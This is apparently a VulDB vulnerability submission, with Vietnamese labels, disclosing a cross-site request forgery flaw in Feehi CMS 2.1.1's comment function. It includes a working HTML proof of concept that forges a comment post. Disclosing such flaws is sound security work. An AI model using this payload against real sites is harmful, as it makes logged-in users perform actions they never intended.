| tiêu đề | Feehi Cms 2.1.1 Csrf Vulnerability Exploit |
|---|
| Mô tả | # Google Dork: [not applicable]
# Date: 14082022
# Exploit Author: haruntamokur
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Windows 10
# CVE : [not applicable]
When you log in application with user and password, you reach “Post my comment” tab. The function has Csrf exploit. If you write exploit code like following, you can exploit this vulnerability.
URL: http://localhost:8080/index.php?r=article%2Fview&id=22#comment-7
Exploit Code
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/index.php?r=article%2Fcomment" method="POST">
<input type="hidden" name="_csrf" value="5EgNi95Un03ZlbGkl3dj2u_lxkDWSlBLz0h4q__4to-rMUHNl2bxCJ2h4calBlacv7_2NqAdJBmpDxKYmsmCuA==" />
<input type="hidden" name="Comment[aid]" value="22" />
<input type="hidden" name="Comment[content]" value="CSRFTest" />
<input type="hidden" name="comment_post_ID" value="114" />
<input type="hidden" name="Comment[reply_to]" value="0" />
<input type="hidden" name="akismet_comment_nonce" value="32920dc775" />
<input type="hidden" name="ak_js" value="101" />
<input type="hidden" name="comment_mail_notify" value="comment_mail_notify" />
<input type="hidden" name="Comment[nickname]" value="harun" />
<input type="hidden" name="Comment[email]" value="" />
<input type="hidden" name="Comment[website_url]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
|
|---|
| Người dùng | harun.tamokur (UID 35839) |
|---|
| Đệ trình | 15/11/2022 11:45 (cách đây 4 những năm) |
|---|
| Kiểm duyệt | 16/11/2022 08:53 (21 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 213788 [FeehiCMS Post My Comment Tab Giả mạo yêu cầu liên trang] |
|---|
| điểm | 17 |
|---|